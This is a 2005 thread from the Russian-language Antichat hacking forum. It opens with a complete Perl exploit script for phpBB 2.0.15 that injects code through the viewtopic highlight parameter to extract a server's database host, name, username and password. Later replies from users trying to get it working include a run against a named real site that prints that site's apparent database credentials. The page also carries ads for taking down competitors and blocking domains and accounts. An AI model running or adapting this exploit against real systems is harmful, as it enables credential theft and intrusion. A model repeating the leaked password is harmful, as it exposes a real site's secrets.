Форум АНТИЧАТ - PhpBB 2.0.15 Database Authentication Details Exploit

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
PhpBB 2.0.15 Database Authentication Details Exploit

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

PhpBB 2.0.15 Database Authentication Details Exploit

31.08.2005, 01:14

VARVAR

Познающий

Регистрация: 03.06.2005

Сообщений: 39

Провел на форуме:
54724

Репутация: 0

PhpBB 2.0.15 Database Authentication Details Exploit

Код:

#!/usr/bin/perl

# **************************************************************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability 
#** This exploit gives the user all the details about the database 
#** connection such as database host, username, password and 
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 
#** 
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# **************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D; 
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;
$delimit = "superloneEST";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

print $sploit,"\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}

Последний раз редактировалось qBiN; 02.12.2005 в 16:50..

31.08.2005, 13:52

Tier

Новичок

Регистрация: 23.11.2004

Сообщений: 14

Провел на форуме:
119556

Репутация: 1

Цитата:

/forum/viewtopic.php?t=1&highlight='.printf(superloneEST. $dbhost.superloneEST.$d
bname.superloneEST.$dbuser.superloneEST.$dbpasswd. superloneEST).'
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:

вот такие пироги, в нужных местах пропуски

)

31.08.2005, 17:47

Dj Skeleton™

Участник форума

Регистрация: 01.06.2002

Сообщений: 225

Провел на форуме:
154966

Репутация: 40

ребята, объясните как заставить это работать.

Цитата:

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@xxxxx.xxx and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Apache/1.3.28 Server at www.xxxxx.xxx Port 80

31.08.2005, 20:13

VARVAR

Познающий

Регистрация: 03.06.2005

Сообщений: 39

Провел на форуме:
54724

Репутация: 0

Работает только на phpBB 2.0.15.

H:\temp>phpbb.pl boastology.com /forum/ 1266
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: boast_phpbb1
[+] Username: boast_phpbb1
[+] Password: cLuTa5OpQx

31.08.2005, 23:00

Tier

Новичок

Регистрация: 23.11.2004

Сообщений: 14

Провел на форуме:
119556

Репутация: 1

Цитата:

Сообщение от VARVAR

а где же собака зарыта?

у мну всеравно пропуски.

04.09.2005, 15:43

Manoz

Познающий

Регистрация: 15.02.2005

Сообщений: 39

Провел на форуме:
280185

Репутация: 7

Отправить сообщение для Manoz с помощью ICQ

Что делать с этим:
<code>
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:
</code>

Опять защита от ламеров?

04.10.2005, 04:35

Grrl

Участник форума

Регистрация: 17.07.2004

Сообщений: 181

Провел на форуме:
560754

Репутация: 97

бесполезный сплойт имхо под эту версию форумов есть сплойт удаленного исполнения команд это куда полезнее.

2stalles

URL http://downloads.activestate.com/Act...SWin32-x86.msi
вот тее перл.
ленивый народ стал ёпть...

07.10.2005, 22:01

Miller

Новичок

Регистрация: 13.09.2005

Сообщений: 1

Провел на форуме:
6061

Репутация: 0

screen:

Вопрос: почему не коннектится ???

02.12.2005, 02:10

KP0T

Новичок

Регистрация: 13.03.2005

Сообщений: 29

Провел на форуме:
111754

Репутация: 0

Аналогично это интересует и меня... Почему?!

#10

02.12.2005, 14:28

m0nzt3r

ветеран

Регистрация: 22.06.2004

Сообщений: 2,128

Провел на форуме:
5355463

Репутация: 2258

Ну наверное прикрыли... да и Grrl говорит правду лучше бы сразу тем сплойтом бы пользовались..

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
phpBB 2.0.15 & WWWThreads	KEZ	Комментарии к видео	36	14.07.2005 19:16
phpBB < 2.0.15, BBCODE URL в phpBB	karapuz	Форумы	21	17.06.2005 06:11
Вопрос про Exploit for phpBB 2.0.2	W!nd	Форумы	2	02.06.2005 09:39
phpBB User id Auth. Bypass and "admin_styles" Code Injection Exploit	madnet	Мировые новости	3	16.03.2005 23:39

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход